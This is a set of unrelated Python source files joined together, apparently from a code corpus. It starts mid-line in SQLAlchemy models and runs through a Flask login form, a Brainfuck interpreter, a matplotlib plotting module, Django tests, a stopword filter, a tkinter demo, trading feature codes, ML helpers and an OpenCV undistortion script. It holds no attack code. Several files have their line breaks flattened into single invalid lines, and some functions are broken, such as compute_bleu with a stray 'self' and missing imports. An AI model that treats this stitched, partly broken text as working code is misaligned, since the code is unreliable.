                            back_populates="payment", lazy='joined')


class Company(Base):
    """A company associated with a payment."""
    __tablename__ = 'companies'
    id = Column(Integer, primary_key=True)
    type = Column(Enum(CompanyType), default=CompanyType.OOO)
    name = Column(String, nullable=False)
    year = Column(Integer, nullable=False)
    phone = Column(String, nullable=False)
    employees_quantity = Column(Integer, nullable=False)
    payment_id = Column(Integer, ForeignKey('payments.id'), nullable=False)
    payment = relationship("Payment", back_populates="companies")


class UserSession(BaseUserSession, Base):
    __tablename__ = 'user_sessions'


DBSession = database.create_session("DBSession")
BlockSession = database.create_session("BlockSession")
from flask.ext.wtf import Form
from wtforms import StringField, PasswordField, validators
from wtforms.fields.html5 import EmailField
from wtforms.validators import Required


class LoginForm(Form):
    """Simple username/password login form."""
    # Consistency fix: `validators.Required` is a deprecated alias of
    # `DataRequired` (the password field already used DataRequired);
    # both fields now use DataRequired.
    user_name = StringField('user_name', [validators.DataRequired()])
    user_password = PasswordField('Password', [validators.DataRequired()])
""" 首先谈到这个语言的定义和运行原理 该语言定义在这样一个环境之上: 你有一列无限长的小火车,每个车厢里装了一个数字,初始为0。 还有一个列车员,初始在最头上那节车厢上。 好了,你把你写的BrainFK程序交给列车员,列车员会做如下的事情: 从左向右、由上自下一个字符一个字符地读取你的程序 当读到`+`的时候,将所在车厢里的数字加一 当读到`-`的时候,将所在的车厢里的数字减一 当读到`>`的时候,跑到后一个车厢去 当读到`<`的时候,跑到前一个车厢去 当读到`[`的时候,如果该车厢里面的数字为0,则跳去执行下一个`]`之后的程序内容 当读到`]`的时候,如果该车想里面的数字不为0,则跳去执行上一个`[`之后的程序内容 当读到`.`的时候,将所在车厢里面的数字翻译成ASCII字符,显示在你的屏幕上 当读到`,`的时候,从等待使用者输入一个ASCII字符,转码成数字写进所在车厢里 """ class Tape(object): """ 纸带 """ def __init__(self): self.tape = [0] self.position = 0 def get(self): return self.tape[self.position] def set(self, val): self.tape[self.position] = val def inc(self): self.tape[self.position] += 1 def dec(self): self.tape[self.position] -= 1 def forward(self): self.position += 1 if len(self.tape) <= self.position: self.tape.append(0) def backward(self): self.position -= 1 class BrainFuck(object): def __init__(self,program,tape_obj): self.program = program # program that you're going to interpret self.pairs = {} self.record() self.tape = tape_obj def record(self): """遍历一次代码,记录'['和']'的相对位置""" left_stack = [] for i,p in enumerate(self.program): if p == '[': left_stack.append(i) if p == ']': left = left_stack.pop() right = i self.pairs[left] = right self.pairs[right] = left def parse(self): values = [] pc = 0 while pc < len(self.program): p = self.program[pc] if p == '+': self.tape.inc() elif p == '-': self.tape.dec() elif p == '>': self.tape.forward() elif p == '<': self.tape.backward() elif p == '[': if self.tape.get() == 0: pc = self.pairs[pc] # 到下一个]所在的地方 elif p == ']': if self.tape.get() != 0: pc = self.pairs[pc] elif p == '.': values.append(chr(self.tape.get())) elif p == ',': self.tape.set(input()) pc += 1 return ''.join(values) if __name__ == '__main__': p = """++++++++++[>+++++++>++++++++++>+++>+<<<<-] >++.>+.+++++++..+++.>++.<<+++++++++++++++. >.+++.------.--------.>+.>.""" p2 = '[-]>[-]>[-]++++[<+++++>-]<+++[<+++++>-]<. >++[<----->-]<-. ---.' tobj = Tape() obj = BrainFuck(p,tobj) print(obj.parse())
from __future__ import division import warnings import sys sys.path.extend(['..', '../..']) with warnings.catch_warnings(): warnings.filterwarnings("ignore") from matplotlib import pyplot, rc, cm, font_manager from matplotlib.mpl import colorbar from matplotlib.ticker import MultipleLocator from cogent.util.progress_display import display_wrap from matplotlib.font_manager import FontProperties from chippy.util.run_record import RunRecord from math import log10, floor, ceil ColorbarBase = colorbar.ColorbarBase __author__ = 'Gavin Huttley, Cameron Jack' __copyright__ = 'Copyright 2011-2013, Gavin Huttley, Cameron Jack, Anuj Pahwa' __credits__ = ['Gavin Huttley', 'Cameron Jack'] __license__ = 'GPL' __maintainer__ = 'Cameron Jack' __email__ = 'cameron.jack@anu.edu.au' __status__ = 'pre-release' __version__ = '0.2' class FigureDetails(object): """ A 'lite' Plottable object to aid in passing useful information to plotting code. Should likely be merged with _Plottable. """ def __init__(self, x_size=5, y_size=3, title=None, x_text=None, y_text=None): self.x_size = x_size self.y_size = y_size self.title = title self.x_text = x_text self.y_text = y_text class _Plottable(object): """ Base class for handling plotting. Defines the appearance of a plot. 
""" def __init__(self, height, width, bgcolor, grid_off, pad=10, xaxis_lims=None, yaxis_lims=None, xy_tick_spaces=None, xy_tick_intervals=None, offset_ticks=False, linewidth=2, title_size=18, font=None, xy_label_fontsizes=(12,12), vline=None, legend_font_size=10, ioff=None, colorbar=False, clean=False): """ height, width = physical size of plot in inches bgcolor = background color {black | white} grid_off = True|False (default False) pad = tick mark padding xaxis_lims = (x_min, x_max) yaxis_lims = (y_min, y_max) xy_tick_spaces = (x, y) tick spacing xy_tick_intervals = (x, y) display values for ticks every n (int) linewidth = thickness of plot lines xy_label_fontsizes = (x, y) font size for axis labels title_size = font size for title font = different font or None:default (Vera Sans) vline = (x, width, style, color) legend_font_size = font size for the plot legend ioff = interactive plot (True is passed in by default) colorbar = include a color scale bar with the plot clean = removes top and right plot edges and their tick marks """ super(_Plottable, self).__init__() if ioff is not None: pyplot.ioff() rc('xtick.major', pad=pad) rc('xtick.minor', pad=pad) self.height = height self.width = width self._set_background(bgcolor, grid_off, vline) self.xlims = xaxis_lims self.ylims = yaxis_lims self.vline = vline self.legend_font_size = legend_font_size self.linewidth = linewidth self.xlabel_fontsize, self.ylabel_fontsize = xy_label_fontsizes self.xtick_space, self.ytick_space = xy_tick_spaces self.font = font self.title_size = title_size self.xtick_interval, self.ytick_interval = xy_tick_intervals self.offset_ticks = offset_ticks self.fig = None self.ax = None self._legend_patches = [] self._legend_labels = [] self._line_collection = [] self._colorbar = colorbar self.clean = clean ### private helper methods def _auto_grid_lines(self, y_diff, test_run=False): """ Returns a float that is a 'round' looking number to use for the grid lines """ rr = 
RunRecord('_auto_grid_lines') if y_diff > 0: ypower = log10(y_diff) if ypower < 0: rounding_places = 0 - int(floor(ypower)) y_diff = float(ceil(y_diff*(10**rounding_places))/\ (10**rounding_places)) grid_line_val = y_diff/10.0 else: y_ceiling = ceil(y_diff) if y_ceiling <= 10: grid_line_val = round(y_ceiling/10.0, 1) else: grid_line_val = y_ceiling/10.0 else: rr.dieOnCritical('Y-axis length must be greater than 0', y_diff) if test_run: rr.addInfo('Y-grid-line spacing', '%e' % grid_line_val) return grid_line_val def _auto_y_lims(self, minY, maxY, rounding=True, test_run=False): """ Takes a list of plotlines. Returns ylims(y_min_limit, y_max_limit) Defaults to min = 0.0, max = 1.0 """ rr = RunRecord('_auto_y_lims') y_floor = minY y_ceiling = maxY if rounding: # Round min/max values to whole values for nice plots # For fractional counts then scale the rounding appropriately if maxY > 0: ypower = log10(maxY) # check scale if ypower < 0: rounding_places = 0 - int(floor(ypower)) y_ceiling = float(ceil(maxY * (10**rounding_places))/ (10**rounding_places)) y_floor = float(floor(minY * (10**rounding_places))/ (10**rounding_places)) elif ypower == 0: y_floor = 0.0 y_ceiling = 1.0 else: # round up to 2 significant digits ypower = ceil(log10(maxY)) y_ceiling = ceil( maxY/(10**(ypower-1)) ) * (10**(ypower-1)) y_floor = floor(minY) elif maxY == 0: y_floor = 0.0 y_ceiling = 1.0 else: rr.dieOnCritical('Negative max y-axis value', maxY) if test_run: rr.addInfo('Y-axis min', minY) rr.addInfo('Y-axis max', maxY) rr.addInfo('Y-axis auto floor', y_floor) rr.addInfo('Y-axis auto ceiling', y_ceiling) return tuple([y_floor, y_ceiling]) def getFigureAndAxes(self, title=None, xlabel=None, ylabel=None): """returns the figure and axis ready for display""" if self.fig is not None: return self.fig, self.ax font = None if self.font is not None: font = FontProperties(font=self.font) if self.xlabel_fontsize: rc('xtick', labelsize=self.xlabel_fontsize, font=font) if self.ylabel_fontsize: 
rc('ytick', labelsize=self.ylabel_fontsize, font=font) else: if self.xlabel_fontsize: rc('xtick', labelsize=self.xlabel_fontsize) if self.ylabel_fontsize: rc('ytick', labelsize=self.ylabel_fontsize) fig = pyplot.figure(figsize=(self.width, self.height)) if self._colorbar: ax = fig.add_axes([0.1, 0.1, 0.8, 0.8]) else: ax = pyplot.gca() ax_kwargs = {} if self.xlims is not None: ax_kwargs['xlim'] = self.xlims if self.ylims is not None: ax_kwargs['ylim'] = self.ylims pyplot.setp(ax, **ax_kwargs) if self.xtick_space is not None: major_locator = MultipleLocator(self.xtick_space) ax.xaxis.set_major_locator(major_locator) if self.ytick_space is not None: major_locator = MultipleLocator(self.ytick_space) ax.yaxis.set_major_locator(major_locator) if self.bgcolor is not None: ax.set_axis_bgcolor(self.bgcolor) if self.xtick_interval is not None: xticks = ax.xaxis.get_major_ticks() for i, xtick in enumerate(xticks): if self.offset_ticks: d, r = divmod(i-1+self.xtick_interval/2, self.xtick_interval) else: d, r = divmod(i-1, self.xtick_interval) xtick.set_visible(False) if r == 0: xtick.set_visible(True) if self.ytick_interval is not None: yticks = ax.yaxis.get_major_ticks() for i, ytick in enumerate(yticks): if self.offset_ticks: d, r = divmod(i-1+self.ytick_interval/2, self.ytick_interval) else: d, r = divmod(i-1, self.ytick_interval) ytick.set_visible(False) if r == 0: ytick.set_visible(True) if self.vline is not None: # e.g. 
x=0, ymin=0, ymax=1, linewidth=3, linestyle='-.', color='w' ax.axvline(**self.vline) if self.grid: ax.grid(**self.grid) if title and font: pyplot.title(title, fontsize=self.title_size, font=font) elif title: pyplot.title(title, fontsize=self.title_size) if ylabel: pyplot.ylabel(ylabel, fontsize=self.ylabel_fontsize) if xlabel: pyplot.xlabel(xlabel, fontsize=self.xlabel_fontsize) ax.ticklabel_format(scilimits=(-2,4), axis='y') ax.ticklabel_format(scilimits=(-5,5), axis='x') self.fig = fig if self.clean is True: for loc, spine in ax.spines.iteritems(): if loc in ['right','top']: spine.set_color('none') # don't draw spine ax.xaxis.set_ticks_position('bottom') ax.yaxis.set_ticks_position('left') self.ax = ax return self.fig, self.ax def _set_background(self, bgcolor, grid_off, vline): """ Called during initialisation. Sets the background to either black or white. bgcolor = 'black'|'white' vline = (x, width, style, color) """ x, vline_width, vline_style, vline_color = vline if bgcolor.lower() == 'black': if grid_off is True: self.grid = False else: self.grid = {'color': 'w'} vline_color = 'w' self.bgcolor='0.0' else: if grid_off is True: self.grid = False else: self.grid = {'color': 'k'} vline_color = 'k' self.bgcolor = '1.0' if not grid_off: self.vline = dict(x=x, linewidth=vline_width, linestyle=vline_style, color=vline_color) def setAxes(self, plot_lines, plot_CI=False, test_run=False): """ Gets called by the __call__ method but is also available for re-scaling of plots. 1) Set the axes to y_min_limit and y_max_limit or call auto-calculate. 
2) Set y-tick-space or auto-calculate """ rr = RunRecord('setAxes') if not self.ylims: minY = self.getMinY(plot_lines, plot_CI) maxY = self.getMaxY(plot_lines, plot_CI) self.ylims = self._auto_y_lims(minY, maxY, test_run=test_run) y_min_limit, y_max_limit = self.ylims # set grid-lines/tick marks if not self.ytick_space: self.ytick_space = self._auto_grid_lines(y_max_limit-y_min_limit, test_run=test_run) if not self.ytick_interval: self.ytick_interval = 2 rr.addInfo('Y-max plot limit', '{:e}'.format(y_max_limit)) rr.addInfo('Y-min plot limit', '{:e}'.format(y_min_limit)) rr.addInfo('Y-grid-line spacing', '{:e}'.format(self.ytick_space)) ### public methods for detailing a plottable object def ion(self): pyplot.ion() def show(self): pyplot.show() def savefig(self, filename, image_format='pdf'): pyplot.savefig(filename, format=image_format) def legend(self, fontsize=None): if self._legend_patches: if fontsize is None: prop = font_manager.FontProperties(size=self.xlabel_fontsize) else: prop = font_manager.FontProperties(size=fontsize) pyplot.legend(self._legend_patches, self._legend_labels, prop=prop) def checkYAxisScale(self, plot_lines, plot_CI=False): """ Compare the set y-axis limits to the actual limits of the data """ rr = RunRecord('checkYAxisScale') maxY = self.getMaxY(plot_lines, plot_CI) minY = self.getMinY(plot_lines, plot_CI) if self.ylims is not None: if maxY > self.ylims[1]: rr.addWarning('ylimit may be too small, ymax=', str(maxY)) elif maxY*2 < self.ylims[1]: rr.addWarning('ylimit may be too large, ymax=', str(maxY)) if minY < self.ylims[0]: rr.addWarning('ylimit may be too small, ymin=', str(minY)) elif minY/2 > self.ylims[0]: rr.addWarning('ylimit may be too large, ymin=', str(minY)) else: rr.addWarning('y-axis limits', 'Not set') def getMaxY(self, plot_lines, plot_CI=False): maxY = 0 # plots are never totally negative for line in plot_lines: peak = line.getMaxCount(include_stderr=plot_CI, se_adjust=1.96) if peak > maxY: maxY = peak return maxY def 
getMinY(self, plot_lines, plot_CI=False): minY = plot_lines[0].counts[0] # better than starting at zero for line in plot_lines: peak = line.getMinCount(include_stderr=plot_CI, se_adjust=1.96) if peak < minY: minY = peak return minY ### Public classes implementing Plottable class PlottableSingle(_Plottable): """Plots a single line""" def __init__(self, *args, **kwargs): super(PlottableSingle, self).__init__(*args, **kwargs) @display_wrap def __call__(self, x_array, plot_lines=None, clean=False, xlabel=None, ylabel=None, title=None, plot_CI=False, ui=None): rr = RunRecord('PlottableSingle__call__') self.setAxes(plot_lines, plot_CI=plot_CI, test_run=False) self.checkYAxisScale(plot_lines, plot_CI=plot_CI) self.fig, self.ax = self.getFigureAndAxes(title=title, xlabel=xlabel, ylabel=ylabel) self.clean=clean for i, line in ui.series(enumerate(sorted(plot_lines, key=lambda line: (line.study,line.rank), reverse=True)), noun='Applying lines to plot'): self.ax.plot(x_array, line.counts, color=line.color, linewidth=self.linewidth) # Show confidence interval around each line if plot_CI: #set shading alpha alpha = line.color[3] if alpha is None: alpha = 0.9 upper = 1.96 * line.stderr + line.counts lower = -1.96 * line.stderr + line.counts self.ax.fill_between(x_array, upper, lower, alpha=alpha/2.5, color=line.color) class PlottableGroups(_Plottable): """plot groups of data on the same panel""" def __init__(self, *args, **kwargs): super(PlottableGroups, self).__init__(*args, **kwargs) @display_wrap def __call__(self, x_array, plot_lines, colorbar=False, clean=False, xlabel=None, ylabel=None, title=None, filename_series=None, labels_size=None, show_legend=False, plot_CI=False, ui=None): rr = RunRecord('PlottableGroups__call__') if not plot_lines: rr.dieOnCritical('No data supplied', 'Failed') self.setAxes(plot_lines, plot_CI=plot_CI, test_run=False) self.checkYAxisScale(plot_lines, plot_CI=plot_CI) self.fig, self.ax = self.getFigureAndAxes(title=title, xlabel=xlabel, 
ylabel=ylabel) self.clean=clean if colorbar: # probably need to set a limit on how big this will be ax2 = self.fig.add_axes([0.925, 0.1, 0.025, 0.8]) cb = ColorbarBase(ax2, ticks=[0.0, 1.0], cmap=cm.RdBu, orientation='vertical') cb.set_ticklabels(['Low', 'High']) ax = self.fig.sca(self.ax) # need to make main axis the current axis again legend_lines = {} for i, line in ui.series(enumerate(sorted(plot_lines, key=lambda line: (line.study,line.rank), reverse=True)), noun='Applying lines to plot'): self.ax.plot(x_array, line.counts, color=line.color, linewidth=self.linewidth) if show_legend: if line.study in legend_lines.keys(): if line.rank < legend_lines[line.study].rank: legend_lines[line.study] = line else: legend_lines[line.study] = line #if filename_series is not None: # pyplot.savefig(filename_series[i]) # Show confidence interval around each line if plot_CI: #set shading alpha alpha = line.alpha upper = 1.96 * line.stderr + line.counts lower = -1.96 * line.stderr + line.counts self.ax.fill_between(x_array, upper, lower, alpha=alpha/2.5, color=line.color) if show_legend: self.legend(labels_size) l_lines = [line for line in sorted(legend_lines.values(), key=lambda x: x.study)] p_lines = [self.ax.plot(x_array, l.counts, color=l.color, linewidth=self.linewidth)[0] for l in l_lines] study_names = [l.study for l in l_lines] self.ax.legend(p_lines, study_names)
from django.core import mail
from django.test import TestCase
from django.shortcuts import resolve_url as r

from eventex.subscriptions.forms import SubscriptionForm
from eventex.subscriptions.models import Subscription


class SubscriptionsNewGet(TestCase):
    """GET /inscricao/ must render the empty subscription form."""

    def setUp(self):
        self.resp = self.client.get(r('subscriptions:new'))

    def test_get(self):
        ''' GET /inscricao/ must return status code 200 '''
        self.assertEqual(200, self.resp.status_code)

    def test_template(self):
        ''' Must use subscriptions/subscription_form.html '''
        self.assertTemplateUsed(
            self.resp, 'subscriptions/subscription_form.html')

    def test_html(self):
        ''' Html must contain input tags '''
        # (html fragment, expected occurrence count) pairs checked in the page.
        tags = (('<form', 1),
                ('<input', 5),
                ('type="text"', 3),
                ('type="email"', 1),
                ('type="submit"', 1))
        for text, count in tags:
            with self.subTest():
                self.assertContains(self.resp, text, count)

    def test_csrf(self):
        ''' Html must contain csrf '''
        self.assertContains(self.resp, 'csrfmiddlewaretoken')

    def test_has_form(self):
        ''' Context must have subscription form '''
        form = self.resp.context['form']
        self.assertIsInstance(form, SubscriptionForm)


class SubscriptionsNewPostValid(TestCase):
    """A valid POST must create a subscription, e-mail it and redirect."""

    def setUp(self):
        data = dict(name='Regis da Silva', cpf='71124336656',
                    email='regis@example.com', phone='11-91234-5678')
        self.resp = self.client.post(r('subscriptions:new'), data)

    def test_post(self):
        ''' Valid POST should redirect to /inscricao/1/ '''
        self.assertRedirects(self.resp, r('subscriptions:detail', 1))

    def test_send_subscribe_email(self):
        # Exactly one confirmation e-mail must have been queued.
        self.assertEqual(1, len(mail.outbox))

    def test_save_subscription(self):
        self.assertTrue(Subscription.objects.exists())


class SubscriptionsNewPostInvalid(TestCase):
    """An invalid (empty) POST must re-render the form with errors."""

    def setUp(self):
        self.resp = self.client.post(r('subscriptions:new'), {})

    def test_post(self):
        ''' Invalid POST should not redirect '''
        self.assertEqual(200, self.resp.status_code)

    def test_template(self):
        self.assertTemplateUsed(
            self.resp, 'subscriptions/subscription_form.html')

    def test_has_form(self):
        form = self.resp.context['form']
        self.assertIsInstance(form, SubscriptionForm)

    def test_form_has_errors(self):
        form = self.resp.context['form']
        self.assertTrue(form.errors)

    def test_dont_save_subscription(self):
        self.assertFalse(Subscription.objects.exists())


class TemplateRegressionTest(TestCase):
    """Regression: non-field errors must actually be rendered by the template."""

    def test_template_has_non_field_errors(self):
        # name+cpf only (no email/phone) triggers a cross-field error.
        invalid_data = dict(name='Regis da Silva', cpf='71124336656')
        response = self.client.post(r('subscriptions:new'), invalid_data)
        self.assertContains(response, '<ul class="errorlist nonfield">')
import sys import io import os import json import time import classify_utils from subprocess import * import subprocess import re # argv[1] - filename to process # using https://pypi.org/project/LatvianStemmer/1.0.1/#files # processed file is saved in the same dir as source as filename_stemmed.tsv def main(): filename = os.path.splitext(sys.argv[1])[0] filename_clean = filename + "_stopwords.tsv" try: os.remove(filename_clean) except OSError: pass stopWords = [] with open ('stopwords_garkaje.txt','rb') as stopWordsFile: for line in stopWordsFile: line = line.decode('utf-8-sig') stopWords.append(line.strip()) with open(sys.argv[1],'rb') as f: for line in f: line = line.decode('utf-8') parts = line.split("\t") tweetText = parts[1] cleanText = "" # if there is punctuation, insert space between tweetText = re.sub(r'[.]+ ',' , ',tweetText) tweetText = re.sub(r'[,]+ ',' , ',tweetText) tweetText = re.sub(r'[?]+ ',' ? ',tweetText) tweetText = re.sub(r'[!]+ ',' ! ',tweetText) words = tweetText.split() for word in words: if (word not in stopWords): cleanText = cleanText + " " + word # for stopWord in stopWords: # # tweetText = re.sub(stopWord,' ',tweetText) # tweetText = tweetText.replace(stopWord," ") # cleanText = tweetText clean_line = parts[0]+"\t"+cleanText+"\t"+parts[2] with open(filename_clean,'ab') as fout: fout.write(clean_line.encode("utf-8")) # execute only if run as a script if __name__ == "__main__": main()
from typing import List import collections class RLEIterator: def __init__(self, encoding: List[int]): self.encode = collections.deque(encoding) def next(self, n: int) -> int: while self.encode: if self.encode[0] < n: n -= self.encode.popleft() self.encode.popleft() elif self.encode[0] == n: self.encode.popleft() return self.encode.popleft() else: self.encode[0] -= n return self.encode[1] return -1 # Your RLEIterator object will be instantiated and called as such: # obj = RLEIterator(encoding) # param_1 = obj.next(n)
from tkinter import * def do_some_action(): if choosen.get() == 'czerwony': button["background"] = 'red' else: button["background"] = 'yellow' root = Tk() root.title("Radiobuttons") root.geometry("250x150") choosen = StringVar() # klasa nalezaca do tkinker, sluzy do prezchowywania stanu przyciskow choosen.set(None) # ustawianie poczatkowej wartosci, zaden z radiobuttonow nie jest wybrany Radiobutton(text="Zmien tlo na czerwony", variable = choosen, value='czerwony').grid(sticky=W) Radiobutton(text="Zmien tlo na zolty", variable = choosen, value='zolty').grid(sticky=W) button = Button(root, text="Action", command=do_some_action) button.grid(sticky=N+S+W+E) root.mainloop() # ex86_gui_radio.py
class Feature_Coding:
    """Feature and label vocabulary for the trading-event model.

    Holds the raw/selected feature column names plus the integer coding
    dictionaries used to map categorical period / trend / event strings to
    model inputs.
    """

    def __init__(self):
        # Every column present in the raw data feed.
        self.featuresAll = ['TimeStamp', 'Symbol', 'Exchange', 'Type', 'PeriodCode',
                            'EventId', 'EventCode', 'EventDir', 'Price', 'VWAPP',
                            'Open', 'High', 'Low', 'Close', 'Volume',
                            'PIR5m', 'PIR15m', 'PIR60m', 'PIRD', 'PIRYD',
                            'PIR5D', 'PIR10D', 'PIR20D',
                            'MarketTrend_D', 'MarketTrend_60', 'MarketTrend_15',
                            'MarketTrend_5', 'MarketTrend_1']
        # Columns actually selected for modelling (includes Label/Profit targets).
        self.featuresSel = ['TimeStamp', 'Type', 'TypeCode', 'Quote', 'Period',
                            'MarketTrend_D', 'MarketTrend_60', 'MarketTrend_15',
                            'MarketTrend_5', 'MarketTrend_1', 'Label', 'Profit']
        # self.featuresSel = ['TimeStamp', 'Type', 'TypeCode', 'PeriodCode', 'Dir', 'MarketTrendCode']
        self.predFeatures = ['TypeCode']
        self.nfeatures = len(self.featuresSel)

        # specify features by type
        self.CONTINUOUS_COLS = []
        self.CATEGORICAL_COLS = ['Type', 'Period', 'MarketTrend']

        # Period name -> period length in minutes (1440 == one trading day).
        self.periodDict = {'PERIOD_1_MIN': 1, 'PERIOD_5_MIN': 5, 'PERIOD_15_MIN': 15,
                           'PERIOD_60_MIN': 60, 'PERIOD_TODAY': 1440}
        # Short period code -> minutes.
        self.periodCodeDict = {'1': 1, '5': 5, '15': 15, '60': 60, 'D': 1440}
        # Alert trend label -> integer code.
        self.alertTrendDict = {'Neutral': 1, 'Bullish': 2, 'Bearish': 3}
        # Market trend label -> integer code.
        self.marketTrendDict = {
            'Unknown': 1, 'Neutral': 2, 'RangeBound': 3,
            'UptrendStarting': 4, 'Uptrend': 5, 'UptrendPullback': 6,
            'UptrendEnding': 7,
            'DowntrendStarting': 8, 'Downtrend': 9, 'DowntrendPullback': 10,
            'DowntrendEnding': 11,
            'UptrendContinuing': 12, 'DowntrendContinuing': 13}

        # Event codes of interest (a subset of eventCodeDict's keys).
        self.eventCodes = [
            'BBLU', 'BBLD', 'BBHU', 'BBHD',
            'HILMFU', 'HILMFD', 'HILFTU', 'HILFTD',
            'MACDBBHU', 'MACDBBHD', 'MACDBBLU', 'MACDBBLD', 'MACDBBTU', 'MACDBBTD',
            'PRCHU', 'PRCHD', 'PRCLU', 'PRCLD',
            'PRCSHU', 'PRCSHD', 'PRCSLU', 'PRCSLD',
            'PRCMHU', 'PRCMHD', 'PRCMLU', 'PRCMLD',
            'PRCLHU', 'PRCLHD', 'PRCLLU', 'PRCLLD',
            'SARSU', 'SARSD', 'SARRU', 'SARRD',
            'RSI20U', 'RSI20D', 'RSI80U', 'RSI80D',
            'MFI20U', 'MFI20D', 'MFI80U', 'MFI80D',
            'EOMU', 'EOMD',
            'SC20', 'SC20U', 'SC20D', 'SC80', 'SC80D', 'SC80U']
        # Event code string -> integer id (ids are grouped per indicator family).
        self.eventCodeDict = {
            'HEARTB': 0, 'VSX': 1, 'VWAPD': 2, 'VWAPU': 3,
            'BBLU': 11, 'BBLD': 12, 'BBHU': 13, 'BBHD': 14,
            'HILMFU': 21, 'HILMFD': 22, 'HILFTU': 23, 'HILFTD': 24,
            'MACDBBHU': 31, 'MACDBBHD': 32, 'MACDBBLU': 33, 'MACDBBLD': 34,
            'MACDBBTU': 35, 'MACDBBTD': 36,
            'PRCHU': 41, 'PRCHD': 42, 'PRCLU': 43, 'PRCLD': 44,
            'PRCSHU': 45, 'PRCSHD': 46, 'PRCSLU': 47, 'PRCSLD': 48,
            'PRCMHU': 49, 'PRCMHD': 50, 'PRCMLU': 51, 'PRCMLD': 52,
            'PRCLHU': 53, 'PRCLHD': 54, 'PRCLLU': 55, 'PRCLLD': 56,
            'SARSU': 61, 'SARSD': 62, 'SARRU': 63, 'SARRD': 64,
            'RSI20U': 71, 'RSI20D': 72, 'RSI80U': 73, 'RSI80D': 74,
            'MFI20U': 81, 'MFI20D': 82, 'MFI80U': 83, 'MFI80D': 84,
            'EOMU': 91, 'EOMD': 92,
            'SC20': 101, 'SC20U': 102, 'SC20D': 103,
            'SC80': 104, 'SC80D': 105, 'SC80U': 106,
            'LRHD': 111, 'LRHU': 112, 'LRLD': 113, 'LRLU': 114,
            'GARTD': 121, 'GARTU': 122
        }
        self.embedding_size = 32  # tbd
        # NOTE(review): vocab_size counts market-trend codes (13), not event
        # codes -- confirm this is the intended embedding vocabulary.
        self.vocab_size = len(self.marketTrendDict.values())
import pandas as pd import numpy as np import string import random import torch def split_data(data): split_data = [] for string in data: split_space = string.split() for i, word in enumerate(split_space): split_data.append(word) return split_data def y_train_make(n): sp = 0 tp = 1 pg = 2 p = 3 np_sp = np.array([sp]) np_tp = np.array([tp]) np_pg = np.array([pg]) np_p = np.array([p]) y = [] for i in range(n): y.append(np_sp) y.append(np_tp) y.append(np_pg) y.append(np_p) return np.array(y) def to_one_hot(label): one_hot = np.zeros((len(label), 4)) one_hot[np.arange(len(label)), label[:, 0]] = 1 return one_hot def src_trg_split(data): src = [] trg = [] for i in range(0, len(data), 2): src.append(data[i]) trg.append(data[i+1]) return np.array(src), np.array(trg) def compute_bleu(self, output, reference): cc = SmoothingFunction() if len(reference) == 3: weights = (0.33,0.33,0.33) else: weights = (0.25,0.25,0.25,0.25) return sentence_bleu([reference], output,weights=weights,smoothing_function=cc.method1) def reparaterization_trick(mean, logv): std = torch.exp(0.5*logv) eps = torch.randn_like(std) return mean + eps * std def Gaussian_score(words): words_list = [] score = 0 yourpath = './train.txt'#should be your directory of train.txt with open(yourpath,'r') as fp: for line in fp: word = line.split(' ') word[3] = word[3].strip('\n') words_list.extend([word]) for t in words: for i in words_list: if t == i: score += 1 return score/len(words)
# -*- coding: utf-8 -*-
"""
Created on Tue May 14 12:23:47 2019

@author: Felix De Mûelenaere
"""
##############################################################################
###########################  Generating test images  #########################
#####                     from MSK gopro videos                           ####
##############################################################################
# Reads the video named in argv[1], undistorts each (half-sized) frame with
# the 'M' camera calibration and writes the rectified frames to Testimgs/.

# Imports
import cv2
import sys
import numpy as np
from time import gmtime, strftime, sleep

# BUG FIX: threshold=np.nan is rejected by modern NumPy (an int is required);
# sys.maxsize reproduces the intended "never summarise arrays" behaviour.
np.set_printoptions(threshold=sys.maxsize)

# BUG FIX: the original indexed sys.argv[1] unconditionally, so running the
# script with no argument raised IndexError instead of printing the hint.
if len(sys.argv) < 2 or not sys.argv[1]:
    print("No imagename given, please provide it as the first argument at " +
          "the CLI!!")
    sys.exit()

##############################################################################
#####               things to think about                     ################
##############################################################################
'''
1. Apply pre-processing to get descent test images
   (see minerva about camera correction and calibration)
2. Use waitKey to obtain 25 FPS, press a certain key to save the test-img
'''

##############################################################################
#####                        Variables                        ################
##############################################################################
path_vids = "D:/School/2018-2019/Project CV - Paintings"  # MSK_01.mp4

# Camera intrinsics / distortion coefficients for the two cameras.
'''calib_W'''
C_W = np.array([[5.6729034524746328e+02, 0., 6.3764777940570559e+02],
                [0., 5.7207768469558505e+02, 3.3299427011674493e+02],
                [0., 0., 1.]])
D_W = np.array([-2.4637408439446815e-01, 7.6662428015464898e-02,
                -2.7014001885212116e-05, -3.1925229062179259e-04,
                -1.2400436109816003e-02])
'''calib_M'''
C_M = np.array([[7.2337882890945207e+02, 0., 6.4226033453805235e+02],
                [0., 7.2844995950341502e+02, 3.2297129949442024e+02],
                [0., 0., 1.]])
D_M = np.array([-2.7971075073202351e-01, 1.2737835217024596e-01,
                5.5264049900636148e-04, -2.4709811526299534e-04,
                -3.7787805887358195e-02])

##############################################################################
#####                           MAIN                          ################
##############################################################################
cap = cv2.VideoCapture(path_vids + '/' + sys.argv[1])

count = 0
mapx = mapy = None  # rectification maps, computed once from the first frame
while cap.isOpened():
    ret, frame = cap.read()
    if not ret:
        # BUG FIX: the original never broke out of the loop, so it spun
        # forever once the video ended.
        break

    im = cv2.resize(frame, (0, 0), fx=0.5, fy=0.5)  # half size horizontally and vertically

    if cap.get(cv2.CAP_PROP_POS_FRAMES) % 100 == 0:
        print("\n100 frames have passed")

    if mapx is None:
        # The frame size never changes, so these maps are loop-invariant;
        # the original recomputed them for every single frame.
        # NOTE(review): im.shape[:-1] is (height, width) while OpenCV
        # expects an imageSize of (width, height) here -- confirm whether
        # the swap is intentional.
        C_scale, roi = cv2.getOptimalNewCameraMatrix(C_M, D_M, im.shape[:-1],
                                                     alpha=0.5)
        mapx, mapy = cv2.initUndistortRectifyMap(C_M, D_M, None, C_scale,
                                                 im.shape[:-1],
                                                 m1type=cv2.CV_32FC1)

    # Remap (undistort) the frame and write it out.
    im_rect = cv2.remap(im, mapx, mapy, cv2.INTER_LINEAR)
    cv2.imwrite('D:/School/2018-2019/Project CV - Paintings/Testimgs/rectified_calibM_v2_s'
                + str(count) + '.png', im_rect)
    count += 1

cap.release()
cv2.destroyAllWindows()
